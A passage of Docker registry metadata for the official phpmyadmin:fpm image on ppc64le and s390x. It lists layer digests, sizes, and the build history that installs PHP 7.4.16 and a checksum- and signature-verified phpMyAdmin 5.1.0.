MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:77668e90b04cbfd3fd302e4d5ad735411aa528f49efbdcfb2be0f26707b58846`
Last Modified: Wed, 31 Mar 2021 13:30:25 GMT
Size: 546.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b2837ad6292d432c97d70d15710f660b0e13a480c2ffe5603930b1d2c874f2f1`
Last Modified: Wed, 31 Mar 2021 13:30:37 GMT
Size: 14.1 MB (14065327 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:de9cb5bb23178c556746faa3eb6f61c44e186ecdda84c4248e59837b0d17c660`
Last Modified: Wed, 31 Mar 2021 13:30:24 GMT
Size: 1.5 KB (1499 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8f2bf631f5bb4bb1da01f9476ad5a19d052ae494272b30c67024f60d04dd523a`
Last Modified: Wed, 31 Mar 2021 13:30:24 GMT
Size: 771.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; ppc64le
```console
$ docker pull phpmyadmin@sha256:90b4e85e59a65d3ce6136a87454bd47fd452752ffc1a39c76113641db2de3a18
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **171.0 MB (170971401 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:7b28a1e26f69524f61cbfd5ec96214af3cd6650e2594cafcdca28d0bb4ebca59`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 22:36:03 GMT
ADD file:a544303d3ec263b38c231310d807e05249140188df5c5a5c785b2f176455ac39 in /
# Tue, 30 Mar 2021 22:36:09 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 11:09:36 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 11:09:39 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 11:12:53 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 11:13:06 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 11:13:18 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 11:31:45 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 11:31:48 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 11:31:53 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 11:31:58 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 12:04:24 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 12:04:28 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 12:04:31 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 12:04:35 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 12:06:46 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 12:06:48 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 12:11:14 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 12:11:21 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 12:11:37 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 12:11:43 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 12:11:45 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 12:11:53 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 12:11:56 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 12:11:58 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 12:12:00 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 09:24:08 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 09:24:10 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 09:24:12 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 09:24:15 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 09:24:25 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 09:24:29 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 09:24:32 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 09:24:40 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 09:24:46 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 09:26:33 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 09:26:46 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 09:26:56 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 09:27:07 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 09:27:12 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:c840eb5e9aed613b2af7557a4b5ad46898b8bc475a2d470c65ec7896b11282f1`
Last Modified: Tue, 30 Mar 2021 22:42:39 GMT
Size: 30.5 MB (30545907 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:609c2a62923b5b74c89e0e6a2975907d38aaa4e4c04d3a1c50454f163d588a55`
Last Modified: Wed, 31 Mar 2021 12:55:54 GMT
Size: 229.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:aab5446013ea62187f1851814ee5a76ef3a061d2679ada7116792838147e136e`
Last Modified: Wed, 31 Mar 2021 12:56:12 GMT
Size: 82.3 MB (82290930 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:00b7faded87e67bbc5dbb85edd1f7549536cb4ac88fed061610320ac232046ea`
Last Modified: Wed, 31 Mar 2021 12:55:52 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9120cd3194c261c8c8d41dca36e7bfc464e70b4825fc2bd36a31dc704bc107d9`
Last Modified: Wed, 31 Mar 2021 13:00:25 GMT
Size: 10.7 MB (10656267 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d296600e09d03777ac8a19f06bb6e1f668ea3da7002270871be22334253f3c8f`
Last Modified: Wed, 31 Mar 2021 13:00:17 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9365c50428f4e16ba237dfbe4933d0162e191564af9000a545378232dd4a238b`
Last Modified: Wed, 31 Mar 2021 13:00:24 GMT
Size: 30.3 MB (30258207 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:070aceba451b8fa2149b44cdf55a5e9c1827729d08e8582fe924796a9bc4a90e`
Last Modified: Wed, 31 Mar 2021 13:00:17 GMT
Size: 2.3 KB (2271 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a177f5261ae42b6f3af9affbbd793adf920649ea81cfd77a70cf2eafea3f1478`
Last Modified: Wed, 31 Mar 2021 13:00:17 GMT
Size: 248.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:09e5fff19229ac55b38f85bb403498abbee48cae5ebf0d32a3bf7b57ef3f9179`
Last Modified: Wed, 31 Mar 2021 13:00:18 GMT
Size: 8.4 KB (8447 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:68f8bb16351d09d4959eaae782fc66e41b5cca28e0ab116e28774fdafae99cc2`
Last Modified: Thu, 01 Apr 2021 09:28:42 GMT
Size: 3.1 MB (3139850 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:1b3cbe414a42329792ba2067c473afff6ee6c9844cf525116075eb3974d598bd`
Last Modified: Thu, 01 Apr 2021 09:28:41 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3c4fdd03de7c25576ee20f4549c6982bf904014bd7712208e6338c73d8188d07`
Last Modified: Thu, 01 Apr 2021 09:28:45 GMT
Size: 14.1 MB (14065438 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:bc0b3b03ba30b1464c46ec05bba1f3e0581f83011c0566d9dad075c7344a8bba`
Last Modified: Thu, 01 Apr 2021 09:28:41 GMT
Size: 1.5 KB (1527 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:46d88d0c0e1d8171a33bcf08bab53585ab84ae9cfab005b0024de9d292cfc3a9`
Last Modified: Thu, 01 Apr 2021 09:28:41 GMT
Size: 772.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; s390x
```console
$ docker pull phpmyadmin@sha256:b0761e58e92f678f5cebfec6eb5db7d94a21a15fb538d6ba3c58b7a1f359950d
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **145.7 MB (145685876 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:bddc686fe2b46276302dbd35d2694c827a177d9bae5c25495b842bbf1ea3b153`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:42:45 GMT
ADD file:df31b107763f0c1cce4527f1e2152ee5b995aa1d062c457c2852bea8dadab8a6 in /
# Tue, 30 Mar 2021 21:42:46 GMT
CMD ["bash"]
# Tue, 30 Mar 2021 23:59:29 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Tue, 30 Mar 2021 23:59:29 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Tue, 30 Mar 2021 23:59:53 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Tue, 30 Mar 2021 23:59:58 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Tue, 30 Mar 2021 23:59:59 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 00:09:14 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 00:09:14 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:09:15 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:09:15 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 00:21:20 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 00:21:21 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 00:21:22 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 00:21:22 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 00:21:36 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 00:21:37 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 00:25:05 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 00:25:08 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 00:25:08 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 00:25:09 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 00:25:09 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 00:25:10 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 00:25:11 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 00:25:11 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 00:25:11 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 09:21:37 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 09:21:37 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 09:21:37 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 09:21:38 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 09:21:40 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 09:21:40 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 09:21:41 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 09:21:41 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 09:21:42 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 09:22:01 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 09:22:05 GMT
